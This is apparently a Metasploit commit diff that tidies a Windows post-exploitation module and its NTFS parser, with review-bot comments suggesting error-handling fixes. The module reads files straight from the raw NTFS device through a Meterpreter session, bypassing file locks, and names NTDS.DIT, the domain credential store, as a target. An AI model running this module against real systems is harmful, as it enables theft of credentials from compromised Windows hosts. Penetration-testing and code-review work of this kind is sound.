Small tidyup

bug/bundler_fix
Meatballs 2015-02-07 11:35:47 +00:00
parent 970c5d115a
commit 358ab2590e
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
2 changed files with 25 additions and 24 deletions


@ -236,7 +236,7 @@ module Rex
def file(path) def file(path)
repertory = mft_record_from_mft_num(5) repertory = mft_record_from_mft_num(5)
index_entry = {} index_entry = {}
for r in path.split('\\') path.split('\\').each do |r|
attributes = mft_record_attribute(repertory) attributes = mft_record_attribute(repertory)
index = index_list_from_attributes(attributes) index = index_list_from_attributes(attributes)
unless index.key?(r) unless index.key?(r)
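Review bot: `mft_record_from_mft_num(5)` at the top of `file` is a magic number; a comment such as `# MFT entry 5 is the root directory (.); walk the path from there` would tell the reader why traversal starts at that record. The new `each` loop splits on a single backslash, so a leading separator or a doubled separator yields an empty component that the `index.key?(r)` lookup will reject; whether that is the intended failure mode is not visible here, since the loop body and the rest of the method lie outside the hunk.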


@ -3,26 +3,27 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'rex/parser/fs/ntfs'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv include Msf::Post::Windows::Priv
require "rex/parser/fs/ntfs"
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Windows File Gathering In Raw NTFS', 'Name' => 'Windows File Gathering In Raw NTFS',
'Description' => %q{ 'Description' => %q(
This module gather file using the raw NTFS device, bypassing some Windows restriction. This module gather file using the raw NTFS device, bypassing some Windows restriction.
Gather file from disk bypassing restriction like already open file with write right lock. Gather file from disk bypassing restriction like already open file with write right lock.
Can be used to retreive file like NTDS.DIT Can be used to retreive file like NTDS.DIT),
},
'License' => 'MSF_LICENSE', 'License' => 'MSF_LICENSE',
'Platform' => ['win'], 'Platform' => ['win'],
'SessionTypes' => ['meterpreter'], 'SessionTypes' => ['meterpreter'],
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], #@danilbaz 'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], # @danilbaz
'References' => [ 'References' => [
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ] [ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
] ]
)) ))
register_options( register_options(
[ [
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil]) OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post
def run def run
winver = sysinfo["OS"] winver = sysinfo["OS"]
if winver =~ /2000/i fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
print_error("Module not valid for Windows 2000") fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
return
end
unless is_admin?
print_error("You don't have enough privileges")
return
end
file_path = datastore['FILE_PATH'] file_path = datastore['FILE_PATH']
r = client.railgun.kernel32.GetFileAttributesA(file_path) r = client.railgun.kernel32.GetFileAttributesA(file_path)
if r['GetLastError'] != 0 if r['GetLastError'] != 0
print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts") fail_with(
return nil Exploit::Failure::BadConfig,
'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
)
end end
drive = file_path[0, 2] drive = file_path[0, 2]
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE", r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0) 'GENERIC_READ',
'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
nil,
'OPEN_EXISTING',
'FILE_FLAG_WRITE_THROUGH',
0)
if r['GetLastError'] != 0 if r['GetLastError'] != 0
print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}") fail_with(
return nil Exploit::Failure::Unknown,
"Error opening #{drive}. Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}")
end end
@handle = r['return'] @handle = r['return']
print_status("Successfuly opened #{drive}") print_status("Successfuly opened #{drive}")
begin begin
fs = Rex::Parser::NTFS.new(self) fs = Rex::Parser::NTFS.new(self)
print_status("Trying gather #{file_path}") print_status("Trying to gather #{file_path}")
path = file_path[3, file_path.length - 3] path = file_path[3, file_path.length - 3]
data = fs.file(path) data = fs.file(path)
file_name = file_path.split("\\")[-1] file_name = file_path.split("\\")[-1]
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file") stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
print_good("Saving file : #{stored_path}") print_good("Saving file : #{stored_path}")
rescue ::Exception => e
print_error("Post failed : #{e.backtrace}")
ensure ensure
client.railgun.kernel32.CloseHandle(@handle) client.railgun.kernel32.CloseHandle(@handle)
end end
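Review bot: The BadConfig branch after the GetFileAttributesA call reports "The file does not exist" for any non-zero GetLastError, although that call also fails for access or sharing reasons; carry the code into the message as the CreateFileA branch below already does, e.g. `"Cannot access #{file_path} (GetLastError=#{r['GetLastError']} - #{r['ErrorMessage']}), use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts"`. The slicing further down (`file_path[0, 2]` for the drive, `file_path[3, ...]` for the path) assumes a `C:\...` form that nothing validates, so a relative path that happens to exist passes the check and `\\.\` plus two arbitrary characters is handed to CreateFileA; a guard such as `fail_with(Exploit::Failure::BadConfig, 'FILE_PATH must be an absolute path like C:\\Windows\\...') unless file_path =~ /\A[a-zA-Z]:\\/` placed before the railgun call would reject that early. As a point of style, the Unknown failure closes its argument list on the string line while the BadConfig one puts `)` on its own line; use one form for both.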